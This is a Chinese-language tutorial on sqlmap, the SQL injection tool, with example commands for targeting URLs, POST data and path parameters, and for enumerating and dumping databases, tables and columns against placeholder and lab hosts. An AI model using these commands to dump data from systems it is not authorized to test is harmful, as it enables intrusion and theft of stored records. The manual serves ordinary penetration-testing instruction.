SqlMap使用手册
0x00 SQLMAP简介
sqlmap是一种开源的***测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常大的检测引擎、具有多种特性的***实测器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。
支持的数据库:mysql,oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase and SAP MaxDB
SQL注入技术:错误注入,基于时间的错误注入,报错注入,union注入
枚举数据:users,password hasher,privileges,roles,databases,tables and columns
0x01 Sqlmap扫描等级(共有7个等级,默认为1)
0、只显示python错误以及严重的信息
1、同时显示基本信息和警告信息。(默认)
2、同时显示debug信息
3、同时显示注入的payload
4、同时显示HTTP请求
5、同时显示HTTP响应头
6、同时显示HTTP响应面
0x02 获取目标方式
参数:-u 或 --url
eg:python sqlmap.py -u http(s)://targeturl[:port]/[...]
0x03 从文本中获取多个目标扫描
参数:-m
文件中保存url格式如下,sqlmap会一个一个检测
www.target1.com/vuln1.php?q=foobar www.target2.com/vuln2.asp?id=1 www.target3.com/vuln3/id/1*
0x04 从文件中加载HTTP请求
参数: -r
sqlmap可以从一个文本中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)。
POST /vuln.php HTTP/1.1 Host: www.target.com User-Agent: Mozilla/4.0 id=1
0x05 POST方式注入
参数: --data
此参数是吧数据以post方式提交,sqlmap会像检测GET参数一样检测POST的参数。
eg:python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1"
0x06 设定超时时间
参数: --timeout
可以设定一个HTTP(S)请求超过多久判定为超时,10.5表示10.5秒,默认是30秒。
0x07 设定重试超时
参数: --retries
当HTTP(S)超时时,可以设定重新尝试连接次数,默认是3次
0x08 测试参数
*
在伪静态注入测试时,sqlmap无法直接使用测试参数,可以在想测试参数的参数后面加*
eg: 1.python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/" 2.python sqlmap.py -u "http://targeturl/param1/value1/param2/value2/15*"
0x09 列举数据库系统的数据库
参数:--dbs
当前用户有权限读取包含所有数据库列表信息的表中的时候,即可列出所有的数据库。
0x10 列举数据库表
参数: --tables -D
列举指定数据库 -D xxxx 的所有表。如果不指定-D 则列举所有数据库中的所有表。
0x11 列举书库表中的字段
参数:--columns -T -D
列举指定数库,指定表中的字段。
eg: python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users [...] Database: SQLite_masterdb Table: users [3 columns] +---------+---------+ | Column | Type | +---------+---------+ | id | INTEGER | | name | TEXT | | surname | TEXT | +---------+---------+
0x12 获取表中数据个数
参数: --count
列举指定数据库表中的数据个数。
eg: python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb [...] Database: testdb +----------------+---------+ | Table | Entries | +----------------+---------+ | dbo.users | 4 | | dbo.users_blob | 2 | +----------------+---------+
0x13 获取整个表的数据或某几个字段的数据。
--dump -D -T -C
列举某个数据库某个表的所有字段
python sqlmap.py -u http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 --dump -D testdb -T dbo.users
列举某个数据库的某个表的某个字段的数据。
python sqlmap.py -u http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 --dump -D testdb -T dbo.users -C ID,NAME
上一篇:详谈事务的几大特点